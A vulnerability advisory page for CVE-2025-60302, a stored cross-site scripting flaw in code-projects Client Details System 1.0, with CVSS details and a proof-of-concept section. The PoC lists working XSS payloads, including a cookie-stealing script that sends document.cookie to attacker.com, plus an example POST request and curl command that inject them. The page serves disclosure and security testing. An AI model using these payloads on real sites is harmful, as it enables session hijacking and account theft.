Security Vulnerability Report
CVE-2025-60302 CVSS 6.1 MEDIUM

CVE-2025-60302

Published: 2025-10-09 16:15:48
Last Modified: 2025-10-29 16:32:51

Description

code-projects Client Details System 1.0 is vulnerable to Cross Site Scripting (XSS). When adding customer information, malicious JavaScript entered in the username field is accepted and stored by the client details system, and it executes in the browser of any user who later views that customer record.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Weakness
CWE-79

Configurations (Affected Products)

cpe:2.3:a:fabian:client_details_system:1.0:*:*:*:*:*:*:* - VULNERABLE
code-projects Client Details System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-60302 PoC: Stored XSS in code-projects Client Details System 1.0 -->
<!-- Attack Vector: Inject malicious JavaScript via the username field when adding customer information -->
<!-- Step 1: Navigate to the "Add Customer" page -->
<!-- Step 2: Fill in the customer form with the following malicious payload in the username field -->
<!-- Payload 1: Basic alert script -->
<script>alert('XSS-Vulnerability-CVE-2025-60302')</script>
<!-- Payload 2: Cookie stealing (for demonstration) -->
<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>
<!-- Payload 3: Event-based XSS -->
<img src=x onerror=alert(document.cookie)>
<!-- Payload 4: SVG-based XSS -->
<svg onload=alert(1)>
<!-- Step 3: Submit the form to store the malicious payload in the database -->
<!-- Step 4: When any user (especially admin) views the customer list or details page, -->
<!-- the injected JavaScript will execute in their browser context -->
<!-- HTTP Request Example (conceptual) -->
<!--
POST /add_customer.php HTTP/1.1
Host: target-host.com
Content-Type: application/x-www-form-urlencoded

username=<script>alert(document.cookie)</script>&[email protected]&phone=1234567890&address=test
-->
<!-- cURL command for testing -->
<!--
curl -X POST "http://target-host.com/add_customer.php" \
  -d "username=<script>alert('XSS')</script>&[email protected]&phone=1234567890&address=test"
-->

References

http://code-projects.com (Product)
https://github.com/Chen1-Boop/CVE/blob/main/CVE-2025-60302.md (Exploit, Third Party Advisory)
